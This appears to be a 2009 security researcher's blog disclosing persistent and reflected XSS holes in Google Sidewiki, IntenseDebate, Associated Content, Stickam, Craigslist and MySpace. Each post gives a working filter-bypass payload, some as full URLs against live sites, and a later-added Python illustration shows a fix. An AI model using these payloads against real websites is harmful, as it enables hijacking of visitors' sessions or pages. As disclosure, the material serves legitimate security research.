This site is soon to be deprecated by http://www.johnleitch.net

Wednesday, September 30, 2009

Persistent XSS Vulnerability - Google.com

Here's a good one: Google Sidewiki has a type 2 XSS vulnerability. Upon editing an entry (and possibly when adding one, I didn't test it) an HTTP proxy such as Fiddler can be used to alter the pagetitle field.



The code replacing the pagetitle value is as follows.
<<a>a onmouseout=alert(0)>a

The inner a tag is stripped out, but because the filter makes only one pass, removing it joins the surrounding fragments into a new a tag.
<a onmouseout=alert(0)>a

The result is a profile containing the arbitrary code.
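As an added illustration, not part of the original post, of why the single-pass stripping described above fails: a constructed Python model of such a filter, run on the page's own Sidewiki input, next to two fixes (stripping until nothing changes, and the preferred option of HTML-encoding the title when it is output). The regex filter is an assumption; the post only says that one pass is performed.

```python
import html
import re

# Assumed model of the title filter: a single regex pass that removes <a ...> tags.
A_TAG = re.compile(r"<a\b[^>]*>", re.IGNORECASE)

# The page's Sidewiki input, used here as the test value.
PAYLOAD = "<<a>a onmouseout=alert(0)>a"


def strip_once(value: str) -> str:
    """Single-pass stripping: the defective behaviour described on the page.

    Removing the inner '<a>' leaves the outer '<' and 'a onmouseout=...>'
    adjacent, so the output is itself a well-formed <a> tag.
    """
    return A_TAG.sub("", value)


def strip_to_fixed_point(value: str) -> str:
    """Repeat stripping until a pass changes nothing.

    This closes the reassembly gap for this filter, but it still relies on the
    regex recognising every tag form the browser does, which is fragile.
    """
    while True:
        stripped = A_TAG.sub("", value)
        if stripped == value:
            return value
        value = stripped


def encode_for_html(value: str) -> str:
    """Preferred fix: treat the title as data and escape it at output time.

    Every '<', '>', '&' and quote becomes an entity, so no tag can form no
    matter how the input is arranged; no stripping or tag knowledge needed.
    """
    return html.escape(value, quote=True)


if __name__ == "__main__":
    print("single pass :", strip_once(PAYLOAD))            # <a onmouseout=alert(0)>a
    print("fixed point :", strip_to_fixed_point(PAYLOAD))  # a
    print("encoded     :", encode_for_html(PAYLOAD))       # &lt;&lt;a&gt;a onmouseout=alert(0)&gt;a
```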



http://www.google.com/profiles/108489460074237220044?hl=en#sidewiki

Friday, September 25, 2009

Persistent XSS Vulnerability - IntenseDebate.com

The profile description field of Intense Debate has a type 2 XSS vulnerability. Using it, arbitrary code can be run when the affected profile is viewed or when the mouse cursor is over the avatar present next to comments posted by the account.





<a style="position:absolute;top:-500px;left:-500px;width:9999px;height:9999px;" onmouseover="alert(0)"></a>

http://intensedebate.com/people/JohnnyCake5

http://www.woodtv.com/dpp/your_money/wall_street/Stocks_End_Low_As_Healthcare_Recovers_2887663#IDComment35942133

Saturday, September 19, 2009

Persistent XSS Vulnerability - AssociatedContent.com

Several fields of the Associated Content profile system have persistent XSS vulnerabilities. Such a vulnerability could be used to craft a rather nasty worm.





The code shown in the screenshots is as follows:

"style="position:absolute;top:0;left:0;width:9999px;height:9999px;"onmouseover="alert(0)

http://www.associatedcontent.com/user/631547/xss_blog.html

Thursday, September 10, 2009

Leveraging Existing CSS - Stickam.com

Stickam's filters are quite strict; attempting to inject a script tag results in an internal error page. The same thing happens with a variety of other tags, any event attribute, certain CSS property values (e.g. setting position to absolute) and even many of the site's CSS IDs and classes. But the filters miss some of the ID selectors that set the element position to absolute, and this can be utilized to cover the entire page with a link.

http://www.stickam.com/onlineMembers.do?personalTags="<a id="cboxTitle"style="height:9999px;width:9999px;"href="http://cross-site-scripting.blogspot.com"</a>

Monday, September 7, 2009

Sidestepping Filters - Craigslist.org

Because of the lack of HTML encoding, tags can be injected using the forum search feature, assuming no results are found. Testing this with H1 tags yields the expected results.



However, attempting the same thing with script results in the page being rendered only up to the opening tag.



But by adding a single character after the closing script tag, the filter causing this behavior can be sidestepped.

http://craigslist.org/forums/?SQ=fffffffff<script>alert(0)</script>f&act=RSR&forumID=8

Friday, September 4, 2009

Exploiting The Meta Tag - Local.Myspace.com

Despite the lack of HTML encoding of data passed to the vulnerable market field, tags cannot be used, as sending a less-than character followed by any alphabetic character redirects the user to a presumably security-related error page. But by injecting the http-equiv attribute, the vulnerable meta tag can be repurposed.

http://local.myspace.com/index.cfm?fuseaction=local.hub&dma=467&market=0;http://cross-site-scripting.blogspot.com/"http-equiv="refresh"